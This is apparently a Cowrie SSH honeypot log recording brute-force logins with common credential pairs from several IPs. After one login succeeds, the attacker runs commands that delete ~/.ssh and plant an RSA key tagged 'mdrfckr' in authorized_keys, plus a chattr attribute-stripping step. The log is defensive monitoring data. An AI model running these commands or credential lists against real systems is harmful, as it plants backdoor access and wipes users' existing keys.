{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:26:48.597332Z","src_ip":"192.210.135.20","session":"268ccb525bcc"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:26:49.075655Z","src_ip":"192.210.135.20","session":"268ccb525bcc"}
{"eventid":"cowrie.session.connect","src_ip":"111.180.193.159","src_port":41000,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2b8c0688708","protocol":"ssh","message":"New connection: 111.180.193.159:41000 (1.2.3.4:22) [session: e2b8c0688708]","sensor":"my-vps","timestamp":"2025-09-09T04:26:49.862921Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:26:49.865268Z","src_ip":"111.180.193.159","session":"e2b8c0688708"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:26:50.070750Z","src_ip":"111.180.193.159","session":"e2b8c0688708"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:26:50.186596Z","src_ip":"192.210.135.20","session":"268ccb525bcc"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":49366,"dst_ip":"1.2.3.4","dst_port":22,"session":"e610706629d7","protocol":"ssh","message":"New connection: 192.210.135.20:49366 (1.2.3.4:22) [session: e610706629d7]","sensor":"my-vps","timestamp":"2025-09-09T04:26:50.294553Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:26:50.297469Z","src_ip":"192.210.135.20","session":"e610706629d7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:26:50.406292Z","src_ip":"192.210.135.20","session":"e610706629d7"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:26:50.882729Z","src_ip":"192.210.135.20","session":"e610706629d7"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:26:50.993303Z","src_ip":"192.210.135.20","session":"8d859b71fa10"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:26:50.994421Z","src_ip":"192.210.135.20","session":"e610706629d7"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56324,"dst_ip":"1.2.3.4","dst_port":22,"session":"44e752288340","protocol":"ssh","message":"New connection: 217.72.205.35:56324 (1.2.3.4:22) [session: 44e752288340]","sensor":"my-vps","timestamp":"2025-09-09T04:27:14.684211Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:27:14.685415Z","src_ip":"217.72.205.35","session":"44e752288340"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":44084,"dst_ip":"1.2.3.4","dst_port":22,"session":"e133d6e6d2be","protocol":"ssh","message":"New connection: 103.59.95.12:44084 (1.2.3.4:22) [session: e133d6e6d2be]","sensor":"my-vps","timestamp":"2025-09-09T04:27:28.837488Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:27:28.849466Z","src_ip":"103.59.95.12","session":"e133d6e6d2be"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:27:29.110331Z","src_ip":"103.59.95.12","session":"e133d6e6d2be"}
{"eventid":"cowrie.login.failed","username":"private","password":"0","message":"login attempt [private/0] failed","sensor":"my-vps","timestamp":"2025-09-09T04:27:30.156399Z","src_ip":"103.59.95.12","session":"e133d6e6d2be"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:27:31.420900Z","src_ip":"103.59.95.12","session":"e133d6e6d2be"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":47918,"dst_ip":"1.2.3.4","dst_port":22,"session":"c313b5a96537","protocol":"ssh","message":"New connection: 51.81.118.153:47918 (1.2.3.4:22) [session: c313b5a96537]","sensor":"my-vps","timestamp":"2025-09-09T04:27:35.438063Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:27:35.438745Z","src_ip":"51.81.118.153","session":"c313b5a96537"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:27:35.535330Z","src_ip":"51.81.118.153","session":"c313b5a96537"}
{"eventid":"cowrie.login.failed","username":"craft","password":"123","message":"login attempt [craft/123] failed","sensor":"my-vps","timestamp":"2025-09-09T04:27:35.960239Z","src_ip":"51.81.118.153","session":"c313b5a96537"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:27:37.058807Z","src_ip":"51.81.118.153","session":"c313b5a96537"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.81.116","src_port":29872,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9c8267c5af4","protocol":"ssh","message":"New connection: 196.251.81.116:29872 (1.2.3.4:22) [session: a9c8267c5af4]","sensor":"my-vps","timestamp":"2025-09-09T04:27:37.602255Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:27:37.620178Z","src_ip":"196.251.81.116","session":"a9c8267c5af4"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":58726,"dst_ip":"1.2.3.4","dst_port":22,"session":"04b93fac22ef","protocol":"ssh","message":"New connection: 154.209.4.55:58726 (1.2.3.4:22) [session: 04b93fac22ef]","sensor":"my-vps","timestamp":"2025-09-09T04:27:44.934127Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:27:44.942492Z","src_ip":"154.209.4.55","session":"04b93fac22ef"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:27:45.140151Z","src_ip":"154.209.4.55","session":"04b93fac22ef"}
{"eventid":"cowrie.login.success","username":"root","password":"manager","message":"login attempt [root/manager] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:27:45.945155Z","src_ip":"154.209.4.55","session":"04b93fac22ef"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:27:46.377532Z","src_ip":"154.209.4.55","session":"04b93fac22ef"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:27:46.378618Z","src_ip":"154.209.4.55","session":"04b93fac22ef"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:27:46.379780Z","src_ip":"154.209.4.55","session":"04b93fac22ef"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:27:46.582480Z","src_ip":"154.209.4.55","session":"04b93fac22ef"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:27:47.113006Z","src_ip":"154.209.4.55","session":"04b93fac22ef"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:27:47.113678Z","src_ip":"154.209.4.55","session":"04b93fac22ef"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:27:47.313795Z","src_ip":"154.209.4.55","session":"04b93fac22ef"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:27:47.314824Z","src_ip":"154.209.4.55","session":"04b93fac22ef"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":59099,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5e331097403","protocol":"ssh","message":"New connection: 154.209.4.55:59099 (1.2.3.4:22) [session: e5e331097403]","sensor":"my-vps","timestamp":"2025-09-09T04:27:47.511751Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:27:47.521084Z","src_ip":"154.209.4.55","session":"e5e331097403"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:27:47.722892Z","src_ip":"154.209.4.55","session":"e5e331097403"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:27:48.532643Z","src_ip":"154.209.4.55","session":"e5e331097403"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:27:49.738760Z","src_ip":"154.209.4.55","session":"e5e331097403"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":59623,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7d406c20073","protocol":"ssh","message":"New connection: 154.209.4.55:59623 (1.2.3.4:22) [session: e7d406c20073]","sensor":"my-vps","timestamp":"2025-09-09T04:27:49.933248Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:27:49.934339Z","src_ip":"154.209.4.55","session":"e7d406c20073"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:27:50.143118Z","src_ip":"154.209.4.55","session":"e7d406c20073"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":51814,"dst_ip":"1.2.3.4","dst_port":22,"session":"a71ace3d4fd8","protocol":"ssh","message":"New connection: 192.210.135.20:51814 (1.2.3.4:22) [session: a71ace3d4fd8]","sensor":"my-vps","timestamp":"2025-09-09T04:27:50.571404Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:27:50.573337Z","src_ip":"192.210.135.20","session":"a71ace3d4fd8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:27:50.682568Z","src_ip":"192.210.135.20","session":"a71ace3d4fd8"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:27:50.984705Z","src_ip":"154.209.4.55","session":"e7d406c20073"}
{"eventid":"cowrie.login.failed","username":"centos","password":"centos1234","message":"login attempt [centos/centos1234] failed","sensor":"my-vps","timestamp":"2025-09-09T04:27:51.160252Z","src_ip":"192.210.135.20","session":"a71ace3d4fd8"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:27:51.192975Z","src_ip":"154.209.4.55","session":"e7d406c20073"}
